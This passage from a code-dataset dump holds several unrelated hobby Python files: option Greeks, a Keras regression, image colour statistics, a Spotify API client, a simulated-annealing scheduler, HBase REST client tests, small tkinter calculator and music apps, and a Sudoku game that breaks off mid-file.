= S * np.exp(nudt + sidt * z[i])\n\t\tpayoff_t += option.payoff(S_t, strike)\n\n\tpayoff_t /= replications\n\tprice = discount_rate * payoff_t\n\n\treturn price\n\ndef Greeks(engine, option, data, pricer):\n\talpha = 0.0001 \n\t(spot, rate, volatility, dividend, expiry, strike) = data.get_data()\n\tdiscount = np.exp(-rate*expiry)\n\tdelta = (pricer(engine, option, \n\t\tMarketData(spot+alpha, rate, volatility, dividend, \n\t\t\texpiry, strike)) - \n\t\tpricer(engine, option, MarketData(spot, rate, \n\t\tvolatility, dividend, expiry, strike))) / alpha\n\tgamma = ((pricer(engine, option, \n\t\tMarketData(spot+alpha, rate, volatility, dividend, \n\t\t\texpiry, strike)) -2.0*\n\t\tpricer(engine, option, MarketData(spot, rate, \n\t\tvolatility, dividend, expiry, strike))) + pricer(engine, option, \n\t\tMarketData(spot-alpha, rate, volatility, \n\t\t\tdividend, expiry, strike)))/(alpha*alpha)\n\trho = (pricer(engine, option, \n\t\tMarketData(spot, rate+alpha, volatility, dividend, \n\t\t\texpiry, strike)) - \n\t\tpricer(engine, option, MarketData(spot, rate, \n\t\tvolatility, dividend, expiry, strike))) / alpha\n\tvega = (pricer(engine, option, \n\t\tMarketData(spot, rate, volatility+alpha, dividend, \n\t\t\texpiry, strike)) - \n\t\tpricer(engine, option, MarketData(spot, rate, \n\t\tvolatility, dividend, expiry, strike))) / alpha\t\n\ttheta = (pricer(engine, option, \n\t\tMarketData(spot, rate, volatility, dividend, \n\t\t\texpiry-(1.0/365.0), strike)) - \n\t\tpricer(engine, option, MarketData(spot, rate, \n\t\tvolatility, dividend, expiry, strike)))\n\n\treturn (delta, gamma, rho/100.0, vega/100.0, 
theta)","repo_name":"dmat1986/Quantitative-Finance","sub_path":"Python/Pricing-models-OOP/pricing_engine.py","file_name":"pricing_engine.py","file_ext":"py","file_size_in_byte":5894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30726319688","text":"import numpy as np # linear algebra\nimport pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)\nimport matplotlib.pyplot as plt\nfrom sklearn.impute import SimpleImputer\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.metrics import r2_score\nfrom tensorflow.python import keras\n\n# Importing data\ndf = pd.read_csv(\"Dataset/water.csv\")\ndf = df.loc[1:1000, ['T_degC', 'Salnty', 'Depthm']]\ndf.head()\n\n# Creating train and test dataset\nmsk = np.random.rand(len(df)) < 0.8\ntrain_raw = df[msk]\ntest_raw = df[~msk]\n\n# Fixing missing values issue and imputing\nimputer = SimpleImputer()\ntrain = pd.DataFrame(imputer.fit_transform(train_raw))\ntrain.columns = df.columns\ntrain.rename(columns={'T_degC': 'TEMP', 'Salnty': 'SALINITY', 'Depthm': 'DEPTH'}, inplace=True)\ntrain = train.reindex(columns={'SALINITY', 'DEPTH', 'TEMP'})\nprint(train.head())\n\ntrain_x = train[['SALINITY', 'DEPTH']]\ntrain_y = train[['TEMP']]\n\n# Splitting into train and test dataset\nX_train_full, X_test, y_train_full, y_test = train_test_split(train_x, train_y, random_state=0)\nX_train, X_valid, y_train, y_valid = train_test_split(X_train_full, y_train_full, random_state=1)\n\nscaler = StandardScaler()\nX_train = scaler.fit_transform(X_train)\nX_valid = scaler.transform(X_valid)\nX_test = scaler.transform(X_test)\n\nmodel = keras.models.Sequential([\n keras.layers.Dense(20, activation=\"relu\"),\n keras.layers.Dense(1)\n])\nmodel.compile(loss=\"mean_squared_error\", optimizer=\"sgd\")\nhistory = model.fit(X_train, y_train, epochs=20, validation_data=(X_valid, y_valid))\nmse_test = model.evaluate(X_test, y_test)\n\n# Predicting\npred = model.predict(X_test)\n\n# Accuracy measures\nprint(\"Mean absolute error: %.2f\" % np.mean(np.absolute(pred - np.asanyarray(y_test))))\nprint(\"Residual sum of squares (MSE): %.2f\" % np.mean((pred - np.asanyarray(y_test)) ** 2))\nprint(\"R2-score: %.2f\" % r2_score(pred, np.asanyarray(y_test)))\n\n# Plotting\npred = model.predict(X_test)\nplt.scatter(pd.DataFrame(X_test[:, 0]), y_test, color='blue')\nplt.scatter(pd.DataFrame(X_test[:, 0]), pred, color='red')\nplt.title('Truth or Bluff (Random Forest Regression)')\nplt.xlabel(\"Salinity\")\nplt.ylabel(\"Temparature\")\nplt.show()\n","repo_name":"dhruvkalia13/ML-journey","sub_path":"5_Artificial_Neural_Networks/Multilayer_Perceptron_Sequential_API/multilayer_Perceptron_regression.py","file_name":"multilayer_Perceptron_regression.py","file_ext":"py","file_size_in_byte":2234,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"37598274477","text":"# coding=utf-8\nimport colorsys\n\n\nclass Properties:\n colors = [(0.125, \"red\"), (0.25, \"orange\"), (0.375, \"yellow\"),\n (0.5, \"green\"), (0.625, \"teal\"), (0.75, \"blue\"),\n (0.875, \"purple\"), (1., \"pink\")]\n\n def __init__(self):\n self.images = []\n self.pix = []\n\n def load(self, images):\n self.images = images\n for image in self.images:\n self.pix.append(image.load())\n\n def rgb_int_to_percent(self, rgb):\n d_tup = (float(rgb[0]) / 255, float(rgb[1]) / 255, float(rgb[2]) / 255)\n return d_tup\n\n # 
-------------------------------------------------- średnia jasność\n\n def trait_avg_value(self, images):\n avg = 0.\n for image in images:\n avg += self.v_in_image(image)\n return avg / len(images)\n\n def v_in_image(self, image):\n avgv = 0.\n pixels = image.load()\n for i in xrange(image.size[0]):\n for j in xrange(image.size[1]):\n per = self.rgb_int_to_percent(pixels[i, j])\n value = colorsys.rgb_to_hsv(per[0], per[1], per[2])[2]\n avgv += value\n\n return avgv / image.size[0] / image.size[1]\n\n\n # --------------------------------------------------średnia dynamika\n\n def trait_avg_value_change(self, images):\n avg = 0.\n size = len(images)\n if size > 1:\n for i in range(1, size):\n avg += self.avg_pair_value_change(images[i - 1], images[i])\n return avg / (size - 1)\n return 0\n\n def avg_pair_value_change(self, image, image1): # ten sam rozmiar!\n avgv = 0.\n pixels = image.load()\n pixels1 = image1.load()\n for i in xrange(image.size[0]):\n for j in xrange(image.size[1]):\n avgv += self.pixel_value_change(pixels[i, j], pixels1[i, j])\n return avgv / image.size[0] / image.size[1]\n\n def pixel_value_change(self, pixel, pixel1):\n per = self.rgb_int_to_percent(pixel)\n h = colorsys.rgb_to_hsv(per[0], per[1], per[2])[2]\n per = self.rgb_int_to_percent(pixel1)\n h1 = colorsys.rgb_to_hsv(per[0], per[1], per[2])[2]\n return abs(h1 - h)\n\n # ----------------------------------------------------------najczęstszy kolor\n def trait_dominating_color(self, images):\n results = self.dominating_image_colors(images[0])\n for i in range(1, len(images)):\n results = [x + y for x, y in zip(results, self.dominating_image_colors(images[i]))]\n return results\n\n def dominating_image_colors(self, image):\n results = [0, 0, 0, 0, 0, 0, 0, 0]\n pixels = image.load()\n for i in xrange(image.size[0]):\n for j in xrange(image.size[1]):\n results[self.assign_pixel_to_color(pixels[i, j])] += 1\n return results\n\n def assign_pixel_to_color(self, pixel):\n per = self.rgb_int_to_percent(pixel)\n hue = colorsys.rgb_to_hsv(per[0], per[1], per[2])[0]\n return int((hue - 0.0625) * 8)\n\n def get_properties(self):\n return self.trait_avg_value(self.images), \\\n self.trait_avg_value_change(self.images), \\\n self.trait_dominating_color(self.images)","repo_name":"mwolanski/RSI-projekt","sub_path":"properties.py","file_name":"properties.py","file_ext":"py","file_size_in_byte":3232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18484000750","text":"## Most of this is from CodingEntrpreneurs on Youtube, \n### My original methods: get_song_id, get_popularity, get_audio_features\n\nimport requests \nimport spotify_cred as sc # Spotify credentials\nimport base64\nfrom urllib.parse import urlencode\nimport datetime as dt\nfrom difflib import SequenceMatcher\n\nclient_id = sc.client_id\nclient_secret = sc.client_secret\n\nclass SpotifyAPI(object):\n access_token = None \n access_token_expires = dt.datetime.now()\n access_token_did_expire = True\n client_id = None \n client_secret = None \n token_url = 'https://accounts.spotify.com/api/token'\n\n \n def __init__(self, client_id, client_secret, *args, **kwargs):\n super().__init__(*args, **kwargs) ## calls any class it inherits from self \n self.client_id = client_id\n self.client_secret = client_secret \n \n def get_client_credentials(self):\n \"\"\"\n Returns base 64 encoded string required for Spotify authentication\n \"\"\"\n client_id = self.client_id\n client_secret = self.client_secret\n \n if client_id 
== None or client_secret == None:\n            raise Exception(\"Client ID and Client Secret must be set.\")\n        \n        client_cred = f'{client_id}:{client_secret}'\n        b64_client_cred = base64.b64encode(client_cred.encode())\n        return b64_client_cred.decode()\n    \n    def get_token_header(self):\n        b64_client_cred = self.get_client_credentials()\n        token_headers = {\n            'Authorization': f\"Basic {b64_client_cred}\", \n            'Content-Type': 'application/x-www-form-urlencoded'\n        }\n        return token_headers\n    \n    def get_token_data(self):\n        token_data = {\n            'grant_type': 'client_credentials'\n        }\n        return token_data\n    \n    def perform_auth(self):\n        token_url = self.token_url\n        token_data = self.get_token_data()\n        token_headers = self.get_token_header()\n        r = requests.post(token_url, data=token_data, headers=token_headers)\n        \n        if r.status_code not in range(200,299):\n            return False\n        \n        token_response_data = r.json()\n        now = dt.datetime.now()\n        access_token = token_response_data['access_token']\n        expires_in = token_response_data['expires_in']\n        expires = now + dt.timedelta(seconds=expires_in)\n        self.access_token = access_token\n        self.access_token_expires = expires\n        self.access_token_did_expire = expires < now\n        return True\n    \n    def get_access_token(self):\n        auth_done = self.perform_auth()  # call the method; the bare attribute was always truthy\n        if not auth_done:\n            raise Exception(\"Authentication failed.\")\n        \n        token = self.access_token \n        expires = self.access_token_expires\n        now = dt.datetime.now()\n        \n        if expires < now:\n            self.perform_auth()\n            return self.get_access_token()\n        elif token == None:\n            self.perform_auth()\n            return self.get_access_token()\n        \n        return token \n    \n    def get_track_header(self):\n        access_token = self.get_access_token()\n        headers = {\n            \"Authorization\": f\"Bearer {access_token}\"\n        } \n        return headers\n    \n    # not be necessary\n    \"\"\"\n    def get_track(self, lookup_id):\n        endpoint = f\"https://api.spotify.com/v1/tracks/{lookup_id}\"\n        headers = self.get_track_header()\n        r = requests.get(endpoint, headers=headers)\n        if r.status_code not in range(200,299):\n            return {}\n        return r.json()\n    \"\"\"\n    \n    def get_song_id(self, song_name, artist_name):\n        search_dict = self.search(song_name)\n        song_id = None\n        popularity = None\n        \n        track_items = search_dict['tracks']['items']\n        for i in track_items:\n            if artist_name[:5] in i['artists'][0]['name'] or SequenceMatcher(None, artist_name, i['artists'][0]['name']).ratio() >= 0.45:\n                song_id = i['id']\n                popularity = i['popularity']\n            else:\n                continue\n        return song_id, popularity\n    \n    def get_popularity(self, song_name, artist_name):\n        popularity = self.get_song_id(song_name, artist_name)[1]\n        return popularity\n    \n    def get_audio_features(self, song_name, artist_name):\n        song_id, popularity = self.get_song_id(song_name, artist_name)\n        endpoint = f'https://api.spotify.com/v1/audio-features/{song_id}'\n        headers = self.get_track_header()\n        r = requests.get(endpoint, headers=headers)\n        if r.status_code not in range(200,299):\n            return {}\n        return r.json()\n    \n    def search(self, query, search_type=\"track\"):\n        query = query.lower().replace(' ', '+')\n        access_token = self.access_token\n        endpoint = \"https://api.spotify.com/v1/search\"\n        headers = self.get_track_header()\n        \n        data = urlencode({'q': query, 'type':search_type.lower()})\n        lookup_url = f\"{endpoint}?{data}\"\n        \n        r = requests.get(lookup_url, headers=headers)\n        if r.status_code not in range(200,299):\n            return {}\n        return r.json()\n","repo_name":"chrisnish4/billboard_100_sentiment","sub_path":"spotify_api_client.py","file_name":"spotify_api_client.py","file_ext":"py","file_size_in_byte":5166,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"40577053958","text":"import data\nimport random\nimport sys\nimport math\nimport time\n\nProcesses = data.tmp.copy()\nN = data.n\nM = data.m\n\nT0 = 100 #100 1000 10000\nL = N #int(math.sqrt(N)) #N N*N\nx = T0/100000 #T0/10000 T0/100000\nalpha = 0.97 #0,95 0,90\nTend = 1 #0.01 #0.001 0.0001\nrm = 'g' #'l' 'g' 'i'\nmm = 't' # 's' 'i' 't' 'a'\n\ndef Cmax(CProcesses):\n    Cstart = 0\n    Cend = 0\n    endList = [[0 for i in range(len(CProcesses[0]))] for j in range(len(CProcesses))]\n    startList = [[0 for i in range(len(CProcesses[0]))] for j in range(len(CProcesses))]\n    for i in range(0, len(CProcesses)):\n        for j in range(0, len(CProcesses[0])):\n            if(i == 0):\n                Cstart = Cend\n                Cend = Cstart + CProcesses[i][j]\n            else:\n                if(j == 0):\n                    Cstart = endList[i-1][j]\n                else:\n                    Cstart = max(endList[i-1][j], Cend)\n                Cend = Cstart + CProcesses[i][j]\n\n            startList[i][j] = Cstart\n            endList[i][j] = Cend\n    return endList[len(CProcesses)-1][len(CProcesses[0])-1]\n\n#ChilleraUtopia\n\ndef deltaCmac(pi, pi_new):\n    return Cmax(pi)-Cmax(pi_new)\n\ndef probability(pi, pi_new, T):\n    delta = deltaCmac(pi, pi_new)\n    prob = math.exp(delta/T)\n    return prob\n\ndef chillLinear(T, x):\n    Ice_Cold_T = T - x\n    return float(Ice_Cold_T)\n\ndef chillGeometric(T, alpha):\n    Ice_Cold_T = T*alpha\n    return float(Ice_Cold_T)\n\ndef chillLog(T, iterator):\n    Ice_Cold_T = T/math.log(iterator+1)\n    return float(Ice_Cold_T)\n\ndef moveMethod(mm, i, j, pi):\n    if mm == 's':\n        for x in range (M):\n            pi[i][x], pi[j][x] = pi[j][x], pi[i][x]\n        #simple swap \n        return pi\n\n    elif mm == 'i':\n        for x in range(M):\n            temp = pi[i][x]\n            for y in range(N):\n                if y < j and y < i: #elements before both the extracted element and its target position\n                    pass\n                elif y < j and y > i: #elements between the extracted element and its target position\n                    pi[y][x] = pi [y-1][x]\n                elif y > j and y < i: #elements between the target position and the extracted element\n                    pi[y][x] = pi [y+1][x]\n                elif y > j and y > i: #elements after both affected positions\n                    pass\n                else:\n                    pass\n        return pi\n\n    elif mm == 't':\n        if i > j:\n            a = j\n            b = i\n        else:\n            a = i\n            b = j #store the indices for more convenient use later\n\n        for x in range(M):\n            lo = a #reset both pointers for every machine/column\n            hi = b\n            while lo < hi:\n                pi[lo][x], pi[hi][x] = pi[hi][x], pi[lo][x] #swap the elements\n                lo = lo + 1 #move the indices towards each other\n                hi = hi - 1\n        return pi\n\n    elif mm == 'a':\n        first = pi[i][0]\n        for x in range (1,M):\n            if x == M-1 :\n                pi[i][x] = first #remember the first element\n            else: \n                pi[i][x] = pi[i][x-1] #shift each element back\n        return pi\n\n    else:\n        pass\n\ndef reduceMethod(rm, T, iterator):\n    if rm == 'l':\n        chill_Lin = chillLinear(T, x)\n        return chill_Lin\n    elif rm == 'g':\n        chill_Geo = chillGeometric(T, alpha)\n        return chill_Geo\n    elif rm == 'i':\n        chill_Log = chillLog(T, iterator)\n        return chill_Log\n    else:\n        pass\n\ndef SAA():\n    pi = Processes.copy()\n    pi_best = pi \n    T = T0\n    iterator = 0\n    while T > Tend:\n        for k in range(1,L):\n            i = random.randint(1,N-1)\n            j = random.randint(1,N-1)\n            pi_new = moveMethod(mm,i,j,[row[:] for row in pi]) #move on a copy so pi itself is not mutated in place\n            if Cmax(pi_new) > Cmax(pi):\n                r = random.random()\n                p = probability(pi, pi_new, T)\n                if r >= p:\n                    pi_new = pi\n            pi = pi_new\n            if Cmax(pi) < Cmax(pi_best):\n                pi_best = pi\n        iterator += 1\n        #print (iterator)\n        T = reduceMethod(rm, T, iterator)\n    return pi_best\n\nstart = time.time()\nprint 
(Cmax(SAA()))\nend = time.time()\nT = end - start\nprint(T)","repo_name":"Cassie051/CDP","sub_path":"task4/lab10.py","file_name":"lab10.py","file_ext":"py","file_size_in_byte":4102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38614510835","text":"class CombineArray:\r\n def __init__(self,l1,l2):\r\n self.ary1 = l1\r\n self.ary2 = l2\r\n\r\n # def combine(self):\r\n # result = [] + self.ary1 + self.ary2\r\n # result.sort() #O(nlogn)\r\n # return result\r\n\r\n def combine(self):#O(n)\r\n result = []\r\n i,j = 0,0\r\n while(i < len(self.ary1) and j < len(self.ary2)):\r\n if(self.ary1[i] <= self.ary2[j]):\r\n result.append(self.ary1[i])\r\n i += 1\r\n else:\r\n result.append(self.ary2[j])\r\n j += 1\r\n while i < len(self.ary1):\r\n result.append(self.ary1[i])\r\n i += 1\r\n \r\n while j < len(self.ary2):\r\n result.append(self.ary2[j])\r\n j += 1\r\n #result += self.ary2[j:]\r\n\r\n return result\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n Comb = CombineArray([1,2,4],[1,3,4])\r\n result = Comb.combine()\r\n print(result)\r\n","repo_name":"francs1/leetcode_basic_60","sub_path":"leetcode入门60题/05链表/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34384749459","text":"from tkinter import *\n\n\ndef frame(master):\n w = Frame(master)\n w.pack(side=TOP, expand=YES, fill=BOTH)\n return w\n\n\ndef button(master, text, command):\n w = Button(master, text=text, command=command, width=6)\n w.pack(side=LEFT, expand=YES, fill=BOTH, padx=2, pady=2)\n return w\n\n\ndef back(text):\n if len(text) > 0:\n return text[:-1]\n else:\n return text\n\n\ndef calculate(text):\n try:\n return eval(text)\n except (SyntaxError, ZeroDivisionError, NameError):\n return 'Error'\n\n\nroot = Tk()\nroot.title(\"Calculator v 0.1\")\ntext = StringVar()\n\nEntry(root, textvariable=text).pack(expand=YES, fill=BOTH, padx=2, pady=4)\n\nfirstRow = frame(root)\nbutton(firstRow, 'BS', lambda t=text: t.set(back(t.get())))\nbutton(firstRow, 'C', lambda t=text: t.set(''))\nbutton(firstRow, '(', lambda t=text: t.set(t.get() + '('))\nbutton(firstRow, ')', lambda t=text: t.set(t.get() + ')'))\n\nfor keyStr in ('789/', '456*', '123-', '0.=+'):\n buttonPanel = frame(root)\n for opName in keyStr:\n if opName == '=':\n button(buttonPanel, opName, lambda t=text: t.set(calculate(t.get())))\n else:\n button(buttonPanel, opName, lambda t=text,\n c=opName: t.set(t.get() + c))\n\nroot.mainloop()\n","repo_name":"Aric-Zhang/PyScripts","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"769290885","text":"import json\nimport responses\nfrom unittest import TestCase\nfrom mock import patch\nfrom hbase.rest_client import HBaseRESTClient\n\n\nclass TestRESTClient(TestCase):\n def setUp(self):\n self.client = HBaseRESTClient(hosts_list=[\"http://localhost:8080\"])\n\n def tearDown(self):\n self.client.session.close()\n\n def test_get_hbase_host(self):\n assert self.client.get_hbase_host() == \"http://localhost:8080\"\n\n @patch(\"requests.Session.get\")\n def test_GET_method(self, mocked_fnc):\n self.client.send_request(\"GET\", \"/test\")\n mocked_fnc.assert_called_with(\n url=\"http://localhost:8080/test\",\n headers={\"accept\": \"application/json\", \"content-type\": \"application/json\"},\n timeout=10,\n )\n\n 
@patch(\"requests.Session.post\")\n def test_POST_method(self, mocked_fnc):\n self.client.send_request(\"POST\", \"/test\", {\"a\": 1})\n mocked_fnc.assert_called_with(\n url=\"http://localhost:8080/test\",\n data='{\"a\": 1}',\n headers={\"accept\": \"application/json\", \"content-type\": \"application/json\"},\n timeout=10,\n )\n\n @patch(\"requests.Session.put\")\n def test_PUT_method(self, mocked_fnc):\n self.client.send_request(\"PUT\", \"/test\", {\"a\": 1})\n mocked_fnc.assert_called_with(\n url=\"http://localhost:8080/test\",\n data='{\"a\": 1}',\n headers={\"accept\": \"application/json\", \"content-type\": \"application/json\"},\n timeout=10,\n )\n\n @patch(\"requests.Session.delete\")\n def test_DELETE_method(self, mocked_fnc):\n self.client.send_request(\"DELETE\", \"/test\")\n mocked_fnc.assert_called_with(\n url=\"http://localhost:8080/test\",\n headers={\"accept\": \"application/json\", \"content-type\": \"application/json\"},\n timeout=10,\n )\n\n @responses.activate\n def test_send_request_success(self):\n expected = {\"table\": [{\"name\": \"message\"}, {\"name\": \"new_table\"}]}\n responses.add(\n responses.GET,\n \"http://localhost:8080/namespaces/default/tables\",\n json=expected,\n status=200,\n )\n result = self.client.send_request(\n method=\"GET\", url_suffix=\"/namespaces/default/tables\"\n )\n assert json.loads(result) == expected\n\n @responses.activate\n def test_send_request_failedd(self):\n payload = \"Bad request\"\n responses.add(\n responses.GET,\n \"http://localhost:8080/namespaces/default/tables\",\n json=payload,\n status=400,\n )\n result = self.client.send_request(\n method=\"GET\", url_suffix=\"/namespaces/default/tables\"\n )\n assert result == {\"error\": '\"Bad request\"', \"status_code\": 400}\n","repo_name":"samirMoP/hbase-rest-py","sub_path":"hbase/test/test_rest_client.py","file_name":"test_rest_client.py","file_ext":"py","file_size_in_byte":2799,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"3491947490","text":"import time\n\nfrom music import *\n\ndb = Database()\nmusic = Music()\nwhile True:\n print(\"\"\"\n******************************************\nChoose Your Operation\n1-Display All Musics\n2-Add Music\n3-Delete Music\n4-Display Total Time Of All Musics\npress q to quit.\n******************************************\n \"\"\")\n op = input(\"\")\n if op == \"1\":\n music.display_musics()\n elif op == \"2\":\n name = input(\"Music name : \")\n name = name.upper()\n minute = int(input(\"Minute: \"))\n second = int(input(\"Second: \"))\n date = input(\"Date: \")\n print(\"Music adding...\")\n time.sleep(1)\n music.add_music(name, minute, second, date)\n print(\"Music added !\")\n time.sleep(1)\n elif op == \"3\":\n name = input(\"Music name : \")\n name = name.upper()\n conf = input(\"Are You Sure ? (y/n)\")\n if conf == \"y\":\n print(\"Music deleting...\")\n time.sleep(1)\n music.delete_music(name)\n print(\"Music deleted !\")\n time.sleep(1)\n elif conf == \"n\":\n print(\"Returning to the main menu...\")\n time.sleep(1)\n continue\n else:\n print(\"Invalid input ! Returning to the main menu...\")\n time.sleep(1)\n elif op == \"4\":\n print(\"Calculating total time...\")\n time.sleep(1)\n music.calculate_total_time()\n elif op == \"q\":\n print(\"Exiting..\")\n time.sleep(1)\n break\n else:\n print(\"Invalid input ! 
Returning to the main menu...\")\n time.sleep(1)\n continue\n","repo_name":"yusufs-d/Python-Projects","sub_path":"Music_App/music_app.py","file_name":"music_app.py","file_ext":"py","file_size_in_byte":1602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32408185878","text":"import tkinter as tk\nfrom tkinter import messagebox\nimport random\nfrom tkinter import *\n\n# Création de la fenêtre principale\nfenetre = tk.Tk()\nfenetre.title(\"Sudoku1Shot\")\n\nCanvas_Width = 740 # Cela permet de bien rendre la fenetre avec de bonne couleur et les boutons et fond bien visible \nCanvas_Height = 400\n\nfenetre.geometry(\"740x400\") #permet de s'assurer que la fenêtre a la bonne taille pour le canevas.\n\nSudoku_Canvas = Canvas(fenetre,bg='#CCCCCC', width= Canvas_Width, height= Canvas_Height) #paramètre bg fixé à \"#CCCCCC\" pour un fond gris clair\nSudoku_Canvas.grid(column=0,row=0,columnspan=20,rowspan=20) #Le widget canvas est placé dans la fenêtre tkinter à l'aide de la méthode grid()\n\n\ngrille_principale = []\nnb_erreurs=0\ndef recommencer_parti():\n global grille_principale, nb_erreurs, temps #signifie que toute modification apportée à cette variable à l'intérieur de la fonction est sauvegarder\n global nb_contraintes, essais_user, nb_cliques, essaie_possible, essaie_utilise #affectera la variable globale du même nom à l'extérieur de la fonction.\n\n temps_label.config(text=\"Temps: 00:00\") # mettre à jour le label pour afficher le temps à 0\n nb_erreurs_label.config(text=\"Erreurs: 0\")\n nb_contraintes_label.config(text=\"Contraintes: 0\")\n essais_restants_label.config(text=\"Essais restants: 5\")\n nb_aleatoire_label.config(text=\"Essais: 5\")\n afficher_erreurs_bouton.config(state='normal')\n aide_bouton.config(state='normal')\n essais_user=0\n essaie_utilise=0\n temps = 0\n nb_erreurs=0\n nb_cliques=0\n essaie_possible=0\n nb_contraintes=0\n\n for ligne in grille_principale: #itère sur chaque ligne de la grille du puzzle.\n for cellule in ligne: #itère sur chaque cellule de la ligne courante.\n #efface le contenu de la cellule courante. \n cellule.delete(0, tk.END)\n #définit la police de caractères de la cellule à \"Arial\" et la taille de police à 10 points. 
\n cellule.config(font=(\"Arial\", 10))\n #définit l'état de la cellule courante à \"normal\", ce qui signifie que le joueur peut y entrer une valeur\n cellule.config(state=\"normal\") \n grille_principale = cree_grille() #génère une nouvelle grille de puzzle et l'assigne à \"grille_principale\".\n\n# Ajout d'un bouton pour redémarrer le jeu\nrestart_bouton = tk.Button(fenetre, text=\"Redémarrer\", command=recommencer_parti)\nrestart_bouton.grid(row=3, column=12)\n\n\nnb_cliques = 0\nessais_user=0\ndef afficher_contraintes():\n global grille_principale, nb_contraintes, nb_cliques, essais_user\n nb_contraintes = 0\n nb_cliques += 1\n essais_user += 1\n\n if nb_cliques == 5:\n afficher_erreurs_bouton.config(state=tk.DISABLED) #Désactiver le bouton lorsque on appuis 5 fois dessus.\n \n # Vérification des contraintes dans chaque ligne\n for l in range(9):\n colonne = []\n # Vérification des contraintes dans chaque colonne\n for c in range(9):\n valeur = grille_principale[c][l].get()\n if valeur != \"\":\n # La valeur existe déjà dans cette colonne\n if valeur in colonne:\n\n for i in range(9):\n if grille_principale[i][l].get() == valeur:\n grille_principale[i][l].config(bg=\"red\")\n nb_contraintes+=1\n else:\n colonne.append(valeur) #permet de mémoriser pour plus tard ou sont placer les doublons\n \n ligne = []\n\n for c in range(9):\n valeur = grille_principale[l][c].get()\n if valeur == \"\" or not valeur.isdigit() or int(valeur) < 1 or int(valeur) > 9: # vérifie si l'utilisateur a saisie une valeur correct \n grille_principale[l][c].config(bg=\"red\")\n nb_contraintes+=1\n else:\n grille_principale[l][c].config(bg=\"white\") #la couleur de fond de la cellule est fixée au blanc pour indiquer qu'elle respecte les contraintes.\n\n if valeur != \"\":\n # La valeur existe déjà dans cette ligne\n if valeur in ligne:\n\n for i in range(9):\n if grille_principale[l][i].get() == valeur:\n grille_principale[l][i].config(bg=\"red\")\n nb_contraintes+=1\n else:\n # Si la valeur ne figure pas dans la liste de lignes, elle l'ajoute à la liste pour vérification ultérieure.\n ligne.append(valeur) # permet de vérifier si une valeur apparaît déjà dans la ligne et dc pas de doublons.\n \n # Vérification des contraintes dans chaque carré\n carre = []\n ligne = (l // 3) * 3 #En divisant l par 3 à l'aide de la division entière on obtient l'indice du carré 3x3 correspondant.\n colonne = (l % 3) * 3 # En multipliant cette valeur par 3, on obtient l'indice de la ligne de départ de ce carré.\n\n for l in range(ligne, ligne + 3):\n for c in range(colonne, colonne + 3):\n valeur = grille_principale[l][c].get()\n if valeur != \"\": #la cellule n'est pas vide\n # La valeur existe déjà dans ce carre\n if valeur in carre:\n \n for i in range(ligne, ligne + 3):\n for j in range(colonne, colonne + 3):\n if grille_principale[i][j].get() == valeur:\n grille_principale[i][j].config(bg=\"red\")\n nb_contraintes+=1\n else:\n carre.append(valeur)\n\n nb_contraintes_label.config(text=f\"Contraintes: {nb_contraintes}\") # mettre à jour le label pour afficher le nombre de containtes à chaque appel de la fonction.\n essais_restants = 5 - essais_user\n essais_restants_label.config(text=\"Essais restants: {}\".format(essais_restants))\n\n# Création d'un bouton pour afficher les contraintes\nafficher_erreurs_bouton = tk.Button(fenetre, text=\"Afficher les contraintes\", command=afficher_contraintes)\nafficher_erreurs_bouton.grid(row=8, column=12)\n\nnb_contraintes_label = tk.Label(fenetre, text=\"Contraintes: 
0\")\nnb_contraintes_label.grid(row=9, column=12)\n\nessais_restants_label = tk.Label(fenetre, text=\"Essais restants: 5\")\nessais_restants_label.grid(row=6, column=12)\n\n\n# Fonction pour mettre à jour le temps toutes les secondes\ntemps=0 # Ajout de la variable temps à zéro\ndef timer_maj():\n global temps\n temps += 1\n # les minutes obtenues par la division entière par 60 et les secondes étant le reste divisée par 60.\n temps_label.config(text=\"Temps: {:02d}:{:02d}\".format(temps // 60, temps % 60))\n # planifie l'appel de la fonction timer_maj() toutes les secondes\n fenetre.after(1000, timer_maj)\n\n# Lancer la fonction pour mettre à jour le temps toutes les secondes, garantit que c'est mise à jour toutes les secondes pour afficher le temps écoulé.\nfenetre.after(1000, timer_maj)\n\n# Ajout d'un label pour afficher le temps\ntemps_label = tk.Label(fenetre, text=\"Temps: 00:00\")\ntemps_label.grid(row=0, column=12)\n\n\ndef creation_grille_aleatoire():\n base = 3\n cote = base*base\n\n # modèle de solution valable pour la ligne de base\n def grille_predefini(l,c): \n return (base*(l%base)+l//base+c)%cote # calcule l'indice d'une cellule en fonction de ses indices de ligne et de colonne.\n\n # choisir des valeurs aléatoire pour les lignes, les colonnes et les nombres\n def randint(s): \n return random.sample(s,len(s)) # utilisée pour mélanger les indices de ligne et de colonne et les valeurs possibles des cellules par la suite.\n \n # Elle est utilisée pour générer les valeurs de ligne et de colonne pour chaque case de la grille.\n base_unique = range(base) \n lignes = [ j*base + l for j in randint(base_unique) for l in randint(base_unique) ] \n colonnes = [ j*base + c for j in randint(base_unique) for c in randint(base_unique) ]\n valeurs = randint(range(1,base*base+1)) # représente les valeurs possibles qui peuvent être remplies dans chaque cellule de la grille.\n\n # créer une grille de sudoku en utilisant un modèle de base aléatoire\n grille = [ [valeurs[grille_predefini(r,c)] for c in colonnes] for r in lignes ]\n return grille\n\n\n# Fonction pour créer la grille de sudoku\ndef cree_grille():\n # Création d'une grille de 9x9 cases (celle de base dans le jeu sudoku)\n grille_cree = []\n # crée une 